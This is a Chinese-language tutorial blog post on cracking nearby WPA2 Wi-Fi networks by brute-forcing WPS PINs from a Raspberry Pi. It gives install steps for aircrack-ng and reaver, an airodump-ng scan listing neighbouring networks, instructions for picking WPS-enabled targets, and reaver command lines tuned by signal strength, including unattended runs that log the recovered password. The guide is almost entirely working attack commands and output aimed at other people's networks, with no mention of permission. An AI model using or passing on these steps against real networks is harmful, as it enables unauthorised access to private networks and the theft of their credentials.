硬件环境

树莓派Raspberry2一个(我用的是debian环境)
PC一台(或其它设备直接操作PI就行)
无线网卡(能用就行,不过强大的无线网卡会事半功倍,我用的AR9271

安装依赖包

sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion ethtool

sudo apt-get install -y libnl-3-200 libnl-3-dev libnl-genl-3-dev libnl-genl-3-200

安装aircarck-ng

svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng/
make
sudo make install

安装reaver

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install

如果上面下载的地址被墙,试下"http://pan.baidu.com/s/1kUdvM1D"

如果安装成功后,会有airmon-ng,airodump-ng,reaver等命令可用。

破解教程

pi@raspberrypi:~ $ sudo airmon-ng start wlan0
Your kernel supports rfkill but you don't have rfkill installed.
To ensure devices are unblocked you must install rfkill.

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  399 wpa_supplicant
  464 avahi-daemon
  477 dhcpcd
  490 avahi-daemon

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Atheros Communications, Inc. AR9271 802.11n

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)


pi@raspberrypi:~ $ sudo airodump-ng wlan0mon

 CH  9 ][ Elapsed: 6 mins ][ 2016-05-23 17:39

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:00:00:00:00:00   -1        0        3    0   1  -1   WPA             
 00:00:00:00:00:00  -52      415       31    0  11  54e  WPA2 CCMP   PSK  RaspberryPi
 00:00:00:00:00:00  -64      359       14    0   6  54e. WPA2 CCMP   PSK  123?.?头人
00:00:00:00:00:00  -69      163        0    0  13  54e  WPA2 CCMP   PSK  FAST_6F9A
 00:00:00:00:00:00  -63      179       67    4  13  54e  WPA2 CCMP   PSK  FAST_zz
 00:00:00:00:00:00  -71      161       11    0   1  54e. WPA2 CCMP   PSK  yan.123
 00:00:00:00:00:00  -71       33        2    0  12  54e  WPA2 CCMP   PSK  FAST_060E
 00:00:00:00:00:00  -77      186        0    0   1  54e. WPA2 CCMP   PSK  TPGuest_5572

根据上面的airodump搜索到的无线信号,然后可以挑信号强的进行破解(注意,要选择开了WPS功能的)
注意看这张列表,列表中显示了你周边无线的相关信息。注意看 MB 这一列,显示为” 54 “、”54e. “等等,这表示了无线当前的速率模式以及WPS开启状况,我自己的路由器是 “steve”,注意看,”54e“和” 54e. “是不同的,多了一个 点,这个点表示开启了 wps模式。所以我们下面就进行wps的探测,在这里我们要记住SSID对应的MAC地址,此后我们会针对MAC地址进行攻击和探测。

sudo reaver -i wlan0mon -b 00:00:00:00:00:00 -a -S -vv -d 10 -t 9 -c 11

-vv 是查看详细信息的,等你熟练了之后,你就可以使用 -v ,这样就简单了。通常,遇到问题才会使用 -vv 。
如果想挂机破解,记得加上nohup命令后,可以断开ssh。然后剩下就是等待。

nohup sudo reaver -i wlan0mon -b 00:00:00:00:00:00 -a -S -vv -d 10 -t 9 -c 11 -o fbi &

-o参数是输出到文件
如果破解成功后,打开输出的日志,就可以看到reaver出来的密码。

reaver:

-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
示例:
reaver -i wlan0mon -b MAC -a -S –d9 –t9 -vv
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i wlan0mon -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i wlan0mon -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i wlan0mon -b MAC -a -S -vv -d5 -c 1

命令是检查reaver进程是否存在

ps -ef | grep reaver 查看reaver后台进程PID号

杀死对应pid进程

kill -9 pid




注意:本文归作者所有,未经作者允许,不得转载